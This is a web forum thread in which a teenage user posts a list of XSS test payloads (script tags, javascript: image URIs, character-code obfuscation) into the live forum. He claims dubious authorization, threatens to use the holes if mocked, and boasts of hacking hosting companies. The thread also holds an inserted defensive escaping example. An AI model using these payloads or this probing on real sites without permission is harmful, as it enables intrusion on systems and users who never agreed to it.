Thread: XSS nar it's just my test. ')alert('xss'); ");alert('xss');

  1. #1
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    XSS nar it's just my test. ')alert('xss'); ");alert('xss');

    <script type=text/javascript>alert("t0pP8uZz")</script>
    <script>alert("t0pP8uZz")</script>;
    <script>alert("t0pP8uZz");</script>
    <script>alert("/t0pP8uZz"/)</script>
    <script>var var = 1; alert(var)</script>

    <IMG SRC="javascript:alert('Vulnerable');">
    <IMG SRC=javascript:alert('Vuln')>
    <IMG SRC=JaVaScRiPt:alert('Vuln')>
    <IMG SRC=javascript:alert("Vuln")>
    <IMG SRC=`javascript:alert("Santa says,
    'vuln'")`>
    <IMG """><SCRIPT>alert("yay for nothin")</SCRIPT>">
    <IMG
    SRC=javascript:alert(String.fromCharCode(88,83,83) )>
    <IMG
    SRC=javascript:alert('tehe')>


    Don't delete, because I thought it would be more constructive for me to do all my testing in one little thread rather than spamming others.

  2. #2
    Join Date
    Jun 2006
    Posts
    3,861
    Mentioned
    3 Post(s)
    Quoted
    1 Post(s)

    ...WTF are you doing?

  3. #3
    Join Date
    Dec 2006
    Location
    .̿̂̔͋͗̎̆ͥ̍̒ͤ͂̾̌̀̅
    Posts
    3,012
    Mentioned
    1 Post(s)
    Quoted
    3 Post(s)

    WTF do you think you're doing

  4. #4
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Hey c0de authorized me to pentest this forum.
    So that's what I'm doing.
    Just to wipe the smug smile off his stupid gormless features.

    This forum has an XSS vuln and has an RFI/LFI hole in the PM system.

    More updates later.

  5. #5
    Join Date
    Dec 2006
    Location
    Sweden
    Posts
    10,812
    Mentioned
    3 Post(s)
    Quoted
    16 Post(s)

    And.. you wanted to tell us why? That's MY secret hole! :@


    Send SMS messages using Simba
    Please do not send me a PM asking for help; I will not be able to help you! Post in a relevant thread or make your own! And always remember to search first!

  6. #6
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Just so you are aware.
    XSS needs to be tested by having values stored server side.
    Well XSS that has any good damage does.

    Sadly though those two holes were not discovered by me.
    So that won't please c0de so I will strive to discover more.
    Then if he doesn't believe me or says I'm a stupid 15 year old again.
    Then I will use these exploits.

    But so he knows.
    The majority of great hackers today are 15-16.

  7. #7
    Join Date
    Aug 2007
    Location
    Hawaii
    Posts
    3,880
    Mentioned
    7 Post(s)
    Quoted
    152 Post(s)

    Should we clap?
    Faith is an oasis in the heart which will never be reached by the caravan of thinking.

  8. #8
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Yay for CSRF

  9. #9
    Join Date
    Jun 2006
    Location
    Australia
    Posts
    435
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    [spam] http://www.youtube.com/watch?v=a_areBajlhA [/spam]
    yeh maybe we should just hold hands and sigh?
    Part of the Scar/SRL community since may 05'

  10. #10
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Not even gunna bother watching it.

  11. #11
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Please be nice, I'm only testing.

  12. #12
    Join Date
    Dec 2006
    Location
    .̿̂̔͋͗̎̆ͥ̍̒ͤ͂̾̌̀̅
    Posts
    3,012
    Mentioned
    1 Post(s)
    Quoted
    3 Post(s)

    Impressive.. not?

  13. #13
    Join Date
    Jun 2006
    Location
    Australia
    Posts
    435
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    OK, sorry. No more shit stirring.

  14. #14
    Join Date
    Feb 2007
    Location
    Het ademt zwaar en moedeloos vannacht.
    Posts
    7,211
    Mentioned
    26 Post(s)
    Quoted
    72 Post(s)

    Two holes in the PM system, not good. Let's hope I don't get hacked.
    Are they in the notification popup and mail?
    Lemme test too yo <- pretty common flaw.

    @Noobs: XSS stands for cross site scripting, some type of security flaw allowing users to add harmful code to a website, such as stuff to hijack sessions and other client side (java)scripts. Actually it should be called CSS, but as there is already a CSS (cascaded style sheets) they just called it XSS.
    Short version: XSS is injecting javascript in websites
    Shortest version: XSS is dangerous
    I made a new script, check it out!.
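
What post #14 describes, seen from the defending side, as an added example that is not part of the thread or any poster's code: HTML output encoding plus an image-URL scheme allowlist, the two checks that make strings like those in post #1 render as inert text. The names `escapeHtml`, `safeImgSrc` and `renderPost` are hypothetical, and the sample inputs are copied or constructed from post #1.

```javascript
// Added example: output encoding plus a URL-scheme allowlist.
// All function names are hypothetical; nothing here is the forum's code.

// Encode the five characters that let text break out of an HTML text node
// or a quoted attribute value.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Accept an image URL only if its scheme is on an allowlist. URL parsing
// ignores tab/CR/LF inside a URL and leading control characters or spaces,
// so strip them explicitly first; the check then does not depend on the
// parser, and "java\nscript:" cannot pass a scheme comparison.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

function safeImgSrc(raw) {
  const cleaned = String(raw).replace(/[\t\r\n]/g, '').replace(/^[\x00-\x20]+/, '');
  let url;
  try {
    url = new URL(cleaned); // absolute URLs only; relative input is rejected
  } catch (e) {
    return null;
  }
  // url.protocol is already lower-cased, so "JaVaScRiPt:" compares as "javascript:".
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Render a stored post body and an optional user-supplied image URL.
function renderPost(body, imageUrl) {
  const src = safeImgSrc(imageUrl);
  const img = src ? `<img src="${escapeHtml(src)}">` : '';
  return `<div class="post">${img}${escapeHtml(body)}</div>`;
}
```

Encoding happens at output time, when the stored value is written into the page, so the same stored post stays safe wherever it is later displayed.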

  15. #15
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    CSRF is more dangerous.
    I can steal anyone's password really.

  16. #16
    Join Date
    Jun 2006
    Posts
    3,861
    Mentioned
    3 Post(s)
    Quoted
    1 Post(s)

    Steal mine and PM it to me

  17. #17
    Join Date
    Dec 2006
    Location
    Sweden
    Posts
    10,812
    Mentioned
    3 Post(s)
    Quoted
    16 Post(s)

    Yesh, try to take mine and PM it to me..

  18. #18
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    I'm testing it as we speak.

  19. #19
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    However, my signature seems to not be working.

  20. #20
    Join Date
    Sep 2006
    Location
    West U.S.
    Posts
    2,172
    Mentioned
    0 Post(s)
    Quoted
    6 Post(s)

    You better not touch mine!!!

    They are sisters...
    Runescape Classic

  21. #21
    Join Date
    Dec 2006
    Location
    Sweden
    Posts
    10,812
    Mentioned
    3 Post(s)
    Quoted
    16 Post(s)

    This guy just wants post count++. I doubt he can hack this forum - Dankness and Fakawi, and others have put too much work into it.

  22. #22
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Oh I'm writing a PM to them all as we speak notifying them of the holes I have found.
    Just for the record.
    What I have done is literally hacked this forum.
    I have found several holes that could allow me to do very nasty things.
    But as I like to auto I am gunna be nice and just tell admins about it.

  23. #23
    Join Date
    May 2007
    Location
    Finland
    Posts
    41
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Quote, originally posted by santascar:
    Oh I'm writing a PM to them all as we speak notifying them of the holes I have found.
    Just for the record.
    What I have done is literally hacked this forum.
    I have found several holes that could allow me to do very nasty things.
    But as I like to auto I am gunna be nice and just tell admins about it.

    A good thing to do in my opinion, but I'd like to hear one of them admins prove you sent a PM.

  24. #24
    Join Date
    Sep 2007
    Posts
    49
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    lol?
    Well I'm not only gunna PM them.
    I'm also gunna attach a post to the back of the thread where I was ridiculed.
    So much to the point that "You're just a stupid 15 year old who can not hack anything!"
    This tears me in half that he is such an idiot.
    The best hacker I know.
    RoMe0
    Is one year older than me.
    And me and him together have taken down hosting companies that gives us access to all the sites hosted by them.
    Now is that not hacking?

  25. #25
    Join Date
    Jun 2007
    Location
    Minnesota
    Posts
    773
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    Why do you feel the need to prove yourself so much?
